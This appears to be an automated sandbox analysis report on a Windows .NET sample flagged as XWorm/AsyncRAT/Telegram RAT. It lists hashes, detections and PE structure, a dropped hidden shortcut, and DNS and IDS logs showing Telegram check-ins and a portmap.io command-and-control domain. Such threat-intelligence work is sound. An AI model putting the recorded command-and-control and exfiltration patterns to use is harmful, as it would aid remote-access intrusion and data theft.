MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Reputation: high, very likely benign file
Preview: @...e...........................................................

Process: C:\Users\user\Desktop\2QaN4hOyJs.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 171520
Entropy (8bit): 6.697932609436561
Encrypted: false
SSDEEP: 3072:cKH+Fd98QO+mUhijzD9hp3ksZfBKexpN9OA5G54oQ:3Ad9jWntkwfBKexpN9OAo54o
MD5: 0999F25F0123E520BB0259A5741F621B
SHA1: 27A3FD47F336DBF4663CBBE1BBDE7A3E76179247
SHA-256: 712AB1B048B49449D00E124E577E7EABE732252E0BA9CE3CEAD7EAF46F44903E
SHA-512: 03EFC0A5549017E46ABE03EAC0D73B169277491A38D33224DE32B916120F65FEFDF165A711EAB174AF30A66C9A7228EEE533D7C48D2648E8EADE053B39DB9188
Malicious: true
Yara Hits:
• Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\System, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\System, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\System, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\System, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\System, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 82%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....odg................................. ........@.. ....................................@.................................D...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......(c...c............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Users\user\Desktop\2QaN4hOyJs.exe
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 20 17:15:00 2024, mtime=Fri Dec 20 17:15:00 2024, atime=Fri Dec 20 17:15:00 2024, length=171520, window=hide
                                                                                                    Category:modified
                                                                                                    Size (bytes):1022
                                                                                                    Entropy (8bit):4.980279557708383
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:8johq2slmRLgKiJbyPeq4AEwZKPamQJfJjOqygm:8joh1EmReEPeqfEwZKABjLyg
                                                                                                    MD5:BEE9E4BE8BAAAF1515A17C3A727F9F3A
                                                                                                    SHA1:029865D83DEE92B8639440C4CF71BDB4E49BA180
                                                                                                    SHA-256:F39391F7155A6E51B4463B52F21978C5534D7A2EF266ADC5AB3FFE6B24FE6D98
                                                                                                    SHA-512:D6AB14FCC25AA4D06698B7D74A41AE6D088447E317DBC04D9DF37DA1EDE3FC6E1E9451A9EA7B6CD2B70330730181334A1F635CB86F69974E2BF0F8D86FCB0A58
                                                                                                    Malicious:false
                                                                                                    Preview:L..................F.... .....5..S....5..S....5..S............................:..DG..Yr?.D..U..k0.&...&.......bBDj...c#1..S..z.9..S......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y............................=...A.p.p.D.a.t.a...B.P.1......Y....Local.<......EWsG.Y.............................G.L.o.c.a.l.....N.1......Y...Temp..:......EWsG.Y.............................T.e.m.p.....T.2......Y. .System..>......Y.Y......'....................W...S.y.s.t.e.m.......V...............-.......U...........\c.p.....C:\Users\user\AppData\Local\Temp\System..#.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.S.y.s.t.e.m.............:...........|....I.J.H..K..:...`.......X.......302494...........hT..CrF.f4... .{I+>.....,...E...hT..CrF.f4... .{I+>.....,...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...
                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):6.697932609436561
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                    File name:2QaN4hOyJs.exe
                                                                                                    File size:171'520 bytes
                                                                                                    MD5:0999f25f0123e520bb0259a5741f621b
                                                                                                    SHA1:27a3fd47f336dbf4663cbbe1bbde7a3e76179247
                                                                                                    SHA256:712ab1b048b49449d00e124e577e7eabe732252e0ba9ce3cead7eaf46f44903e
                                                                                                    SHA512:03efc0a5549017e46abe03eac0d73b169277491a38d33224de32b916120f65fefdf165a711eab174af30a66c9a7228eee533d7c48d2648e8eade053b39db9188
                                                                                                    SSDEEP:3072:cKH+Fd98QO+mUhijzD9hp3ksZfBKexpN9OA5G54oQ:3Ad9jWntkwfBKexpN9OAo54o
TLSH: C4F329D2E6DF1278DC5F9E3521120C9B46B79C3E995AA13B06C1BA4F85B36E34973203
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....odg................................. ........@.. ....................................@................................
Icon Hash: 0030383038181800
Entrypoint: 0x40c69e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67646F8D [Thu Dec 19 19:10:05 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc644 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe000 | 0x1f188 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa6a4 | 0xa800 | 1480c585b5a54f001a806407a4a779cb | False | 0.4873744419642857 | data | 5.6917684477827235 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe000 | 0x1f188 | 0x1f200 | 16d7b4cb358bad8e87cfaf706ebf5229 | False | 0.4681460215863454 | data | 6.572859043089958 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2e000 | 0xc | 0x200 | c7b91688353e8a3874c53b373b44b3c9 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xe220 | 0x65b1 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 1.000614604540391
RT_ICON | 0x147d4 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | | | 0.2720779604874009
RT_ICON | 0x24ffc | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | | | 0.4463863958431743
RT_ICON | 0x29224 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.5135892116182572
RT_ICON | 0x2b7cc | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.6050656660412758
RT_ICON | 0x2c874 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.7446808510638298
RT_GROUP_ICON | 0x2ccdc | 0x5a | data | | | 0.7333333333333333
RT_VERSION | 0x2cd38 | 0x264 | data | | | 0.4526143790849673
RT_MANIFEST | 0x2cf9c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T19:15:05.861207+0100 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.9 | 49854 | 149.154.167.220 | 443 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 19:14:03.397257090 CET | 192.168.2.9 | 1.1.1.1 | 0xe292 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:01.502505064 CET | 192.168.2.9 | 1.1.1.1 | 0xf25b | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:03.807075024 CET | 192.168.2.9 | 1.1.1.1 | 0xaff4 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:05.988318920 CET | 192.168.2.9 | 1.1.1.1 | 0x515 | Standard query (0) | Brian123121-27796.portmap.io | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:10.795805931 CET | 192.168.2.9 | 1.1.1.1 | 0x57c | Standard query (0) | Brian123121-27796.portmap.io | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:20.001219034 CET | 192.168.2.9 | 1.1.1.1 | 0x8e48 | Standard query (0) | Brian123121-27796.portmap.io | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:28.108237982 CET | 192.168.2.9 | 1.1.1.1 | 0x453e | Standard query (0) | Brian123121-27796.portmap.io | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:36.124474049 CET | 192.168.2.9 | 1.1.1.1 | 0x9670 | Standard query (0) | Brian123121-27796.portmap.io | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:43.982878923 CET | 192.168.2.9 | 1.1.1.1 | 0x7c30 | Standard query (0) | Brian123121-27796.portmap.io | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:50.686002016 CET | 192.168.2.9 | 1.1.1.1 | 0xb887 | Standard query (0) | Brian123121-27796.portmap.io | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:55.577055931 CET | 192.168.2.9 | 1.1.1.1 | 0xfe8b | Standard query (0) | Brian123121-27796.portmap.io | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:16:00.939661026 CET | 192.168.2.9 | 1.1.1.1 | 0xe99a | Standard query (0) | Brian123121-27796.portmap.io | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:16:05.857928991 CET | 192.168.2.9 | 1.1.1.1 | 0x7d49 | Standard query (0) | Brian123121-27796.portmap.io | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 19:13:56.894419909 CET | 1.1.1.1 | 192.168.2.9 | 0xe0c0 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 19:13:56.894419909 CET | 1.1.1.1 | 192.168.2.9 | 0xe0c0 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:14:03.534163952 CET | 1.1.1.1 | 192.168.2.9 | 0xe292 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:01.647238970 CET | 1.1.1.1 | 192.168.2.9 | 0xf25b | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:01.647238970 CET | 1.1.1.1 | 192.168.2.9 | 0xf25b | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:01.647238970 CET | 1.1.1.1 | 192.168.2.9 | 0xf25b | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:03.944658041 CET | 1.1.1.1 | 192.168.2.9 | 0xaff4 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:06.418505907 CET | 1.1.1.1 | 192.168.2.9 | 0x515 | Name error (3) | Brian123121-27796.portmap.io | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:10.933892965 CET | 1.1.1.1 | 192.168.2.9 | 0x57c | Name error (3) | Brian123121-27796.portmap.io | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:20.138489962 CET | 1.1.1.1 | 192.168.2.9 | 0x8e48 | Name error (3) | Brian123121-27796.portmap.io | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:28.245841026 CET | 1.1.1.1 | 192.168.2.9 | 0x453e | Name error (3) | Brian123121-27796.portmap.io | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:36.263654947 CET | 1.1.1.1 | 192.168.2.9 | 0x9670 | Name error (3) | Brian123121-27796.portmap.io | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:15:44.124100924 CET | 1.1.1.1 | 192.168.2.9 | 0x7c30 | Name error (3) | Brian123121-27796.portmap.io | none | none | A (IP address) | IN (0x0001) | false
